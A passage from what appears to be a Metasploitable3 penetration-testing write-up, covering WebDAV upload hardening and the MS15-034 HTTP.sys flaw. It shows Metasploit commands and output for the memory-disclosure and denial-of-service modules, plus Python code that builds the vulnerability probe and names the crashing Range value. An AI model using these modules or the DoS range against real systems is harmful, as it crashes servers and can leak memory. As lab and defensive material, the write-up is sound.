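    '192.168.22.1 - - [08/Feb/2021:17:45:01 +0800] "PUT /uploads/x.php HTTP/1.1" 403 199',
]

if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG):
        print(alert)
```

The rejected PUT from 192.168.22.1 produces no alert, which is the shape a hardened server should produce for every write: in Apache that means putting the WebDAV write methods behind authentication (`<LimitExcept GET HEAD OPTIONS PROPFIND>` with `Require valid-user` inside the `<Directory>` block) and switching the PHP engine off for the upload directory (`php_admin_flag engine off`) so that a file that does get stored is served as text rather than executed, which is exactly the PUT-succeeds-but-EXEC-fails outcome davtest reported for the other extensions.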

6. HTTP protocol stack request handling: HTTP.sys memory information disclosure (MS15-034)

msf6 > search ms15_034     find the matching modules

Matching Modules
================

   #  Name                                                  Disclosure Date  Rank    Check  Description
   -  ----                                                  ---------------  ----    -----  -----------
   0  auxiliary/dos/http/ms15_034_ulonglongadd                               normal  Yes    MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service
   1  auxiliary/scanner/http/ms15_034_http_sys_memory_dump                   normal  Yes    MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure


Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/http/ms15_034_http_sys_memory_dump

msf6 > use auxiliary/scanner/http/ms15_034_http_sys_memory_dump     select the module
msf6 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > show options     show the options that must be set

Module options (auxiliary/scanner/http/ms15_034_http_sys_memory_dump):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             80               yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   SUPPRESS_REQUEST  true             yes       Suppress output of the requested resource
   TARGETURI         /                no        URI to the site (e.g /site/) or a valid file resource (e.g /welcome.png)
   THREADS           1                yes       The number of concurrent threads (max one per host)
   VHOST                              no        HTTP server virtual host

msf6 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > set rhosts 192.168.22.20   target IP address
rhosts => 192.168.22.20
msf6 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > run         execute
 
[+] Target may be vulnerable...
[+] Stand by...
[-] Memory dump start position not found, dumping all data instead

[+] Memory contents:
48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64    |HTTP/1.1 400 Bad|
20 52 65 71 75 65 73 74 0d 0a 43 6f 6e 74 65 6e    | Request..Conten|
74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d    |t-Type: text/htm|
6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73    |l; charset=us-as|
63 69 69 0d 0a 53 65 72 76 65 72 3a 20 4d 69 63    |cii..Server: Mic|
72 6f 73 6f 66 74 2d 48 54 54 50 41 50 49 2f 32    |rosoft-HTTPAPI/2|
2e 30 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 30    |.0..Date: Mon, 0|
38 20 46 65 62 20 32 30 32 31 20 31 30 3a 31 33    |8 Feb 2021 10:13|
3a 30 34 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74    |:04 GMT..Connect|
69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74    |ion: close..Cont|
65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 34 36 0d    |ent-Length: 346.|
0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d    |...<!DOCTYPE HTM|
4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43    |L PUBLIC "-//W3C|
2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f    |//DTD HTML 4.01/|
2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e    |/EN""http://www.|
77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f    |w3.org/TR/html4/|
73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48    |strict.dtd">..<H|
54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45    |TML><HEAD><TITLE|
3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49    |>Bad Request</TI|
54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50    |TLE>..<META HTTP|
2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d    |-EQUIV="Content-|
54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74    |Type" Content="t|
65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65    |ext/html; charse|
74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45    |t=us-ascii"></HE|
41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42    |AD>..<BODY><h2>B|
61 64 20 52 65 71 75 65 73 74 20 2d 20 52 65 71    |ad Request - Req|
75 65 73 74 20 54 6f 6f 20 4c 6f 6e 67 3c 2f 68    |uest Too Long</h|
32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20    |2>..<hr><p>HTTP |
45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 73    |Error 400. The s|
69 7a 65 20 6f 66 20 74 68 65 20 72 65 71 75 65    |ize of the reque|
73 74 20 68 65 61 64 65 72 73 20 69 73 20 74 6f    |st headers is to|
6f 20 6c 6f 6e 67 2e 3c 2f 70 3e 0d 0a 3c 2f 42    |o long.</p>..</B|
4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a             |ODY></HTML>..|


[+] Memory dump saved to /root/.msf4/loot/20210208181305_default_192.168.22.20_iis.ms15034_283153.bin
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Read the loot before reporting it: the "memory contents" saved here are just the body of an HTTP 400 response (Bad Request - Request Too Long, served by Microsoft-HTTPAPI/2.0). The module said it could not find a dump start position and stored the raw reply instead, so this run leaked no kernel memory even though the pre-check judged the target likely vulnerable.

7. HTTP protocol stack request handling denial of service (MS15-034)

msf6 > search ms15_034      same two modules as in step 6; this time index 0, the DoS module, is used

msf6 > use  auxiliary/dos/http/ms15_034_ulonglongadd
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > show options     show the options that must be set

Module options (auxiliary/dos/http/ms15_034_ulonglongadd):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                no        URI to the site (e.g /site/) or a valid file resource (e.g /welcome.png)
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host

msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > set rhosts 192.168.22.20    target IP address
rhosts => 192.168.22.20
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > run     execute

[*] DOS request sent
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > 
[*] 192.168.22.20 - Meterpreter session 2 closed.  Reason: Died
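
The check that both MS15-034 modules (steps 6 and 7) rely on, as an added example (Python, written for this page; it is not the modules' own code): the probe is a Range header whose end is 2^64-1, a vulnerable HTTP.sys answers 416 where a patched one answers 400, and the 64-bit addition that wraps on those bounds is shown alongside. Response bytes and hosts are constructed; only `check_host` talks to a server and it is not run offline. The DoS range is kept as a constant so it can be recognised in traffic, not so it can be sent.

```python
import http.client

MAX_U64 = 2**64 - 1
CHECK_RANGE = f"bytes=0-{MAX_U64}"   # non-destructive probe used by the check
DOS_RANGE = f"bytes=18-{MAX_U64}"    # the range the DoS module sends; crashes a vulnerable host


def range_length_u64(start: int, end: int) -> int:
    """Inclusive range length as 64-bit code computes it: end - start + 1, wrapping on overflow.
    The bug class behind MS15-034 is this unchecked addition on attacker-controlled bounds
    (the fixed code uses a checked add, hence the module name ulonglongadd)."""
    return (end - start + 1) & MAX_U64


def build_check_request(host: str, path: str = "/") -> bytes:
    """Raw request bytes, for a plain socket or for comparison against a capture."""
    return f"GET {path} HTTP/1.1\r\nHost: {host}\r\nRange: {CHECK_RANGE}\r\n\r\n".encode()


def parse_status_line(raw: bytes):
    line = raw.split(b"\r\n", 1)[0].decode("latin-1")
    _version, code, *reason = line.split(" ", 2)
    return int(code), " ".join(reason)


def classify(status: int, body: bytes = b"", server: str = "Microsoft-IIS") -> str:
    """416 to the oversized Range: HTTP.sys accepted the range and failed on it, i.e. vulnerable.
    400: the Range header was rejected up front, which is what the patched parser does.
    A 400 whose body says 'Request Too Long' is a header-size rejection (the dump in step 6 shows
    exactly that) and says nothing about MS15-034. Other servers also send 416 for bad ranges,
    so a non-Microsoft Server header yields no verdict either."""
    if not server.startswith("Microsoft"):
        return "unknown"
    if status == 416:
        return "vulnerable"
    if status == 400:
        return "unknown" if b"Request Too Long" in body else "patched"
    return "unknown"


def check_host(host: str, port: int = 80, path: str = "/") -> str:
    """Live check (not run offline). Point path at a static resource, e.g. the default document
    or /welcome.png, because the Range applies to the response body."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request("GET", path, headers={"Host": host, "Range": CHECK_RANGE})
    res = conn.getresponse()
    verdict = classify(res.status, res.read(), res.getheader("Server", ""))
    conn.close()
    return verdict


if __name__ == "__main__":
    print(build_check_request("192.168.22.20").decode())
    print("64-bit length of the check range:", range_length_u64(0, MAX_U64))  # wraps to 0
    code, _reason = parse_status_line(b"HTTP/1.1 416 Requested Range Not Satisfiable\r\n\r\n")
    print(classify(code))
```

The check is safe to run because a single 416 costs the server nothing; the DoS range is the one that takes the kernel down, and as the transcript shows it takes every session on the box with it.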

[The Meterpreter session from step 5 closed during this step (Reason: Died): the MS15-034 DoS crashes HTTP.sys, which runs in the kernel, so the whole target goes down and every session on it goes with it.]

[This completes the Metasploitable3 penetration-testing exercise.]
